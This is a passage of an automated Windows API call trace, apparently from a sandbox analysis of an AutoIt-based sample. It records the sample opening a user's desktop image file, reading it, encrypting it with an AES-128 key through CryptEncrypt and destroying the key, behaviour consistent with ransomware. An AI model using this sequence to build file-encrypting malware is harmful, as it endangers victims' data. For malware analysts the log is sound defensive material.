RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0167.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0167.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0167.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0167.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s1epd3.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0167.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0167.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0167.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.040] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0167.040] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0167.043] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x1488, lpOverlapped=0x0) returned 1 [0167.043] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0167.045] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11488) returned 0x9e5190 [0167.045] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.045] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0167.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.045] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0167.046] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0167.046] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0167.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0167.046] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0167.046] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.047] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0167.047] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0167.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0167.048] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.048] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.048] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0167.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.049] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0167.049] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0167.049] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0167.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0167.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0167.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.050] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.050] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.050] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.050] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.050] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.051] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.051] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.051] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.051] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.051] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.057] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.058] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.058] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.058] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.058] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x11488, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x11490) returned 1 [0167.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.059] CharLowerBuffW (in: lpsz="byte[70801]", cchLength=0xb | out: lpsz="byte[70801]") returned 0xb [0167.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.061] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.061] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.061] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.061] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa18f40*, pdwDataLen=0x87e820*=0x11488, dwBufLen=0x11490 | out: pbData=0xa18f40*, pdwDataLen=0x87e820*=0x11490) returned 1 [0167.063] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.063] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.063] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.066] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.066] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.066] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.066] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.066] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.066] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.066] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.066] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.066] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.066] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.066] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.066] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.066] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.066] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.078] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.078] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.078] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0167.078] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.078] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.078] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0167.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.078] CryptDestroyKey (hKey=0x90af98) returned 1 [0167.081] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.082] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.082] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.082] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.082] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0167.082] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0167.082] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, 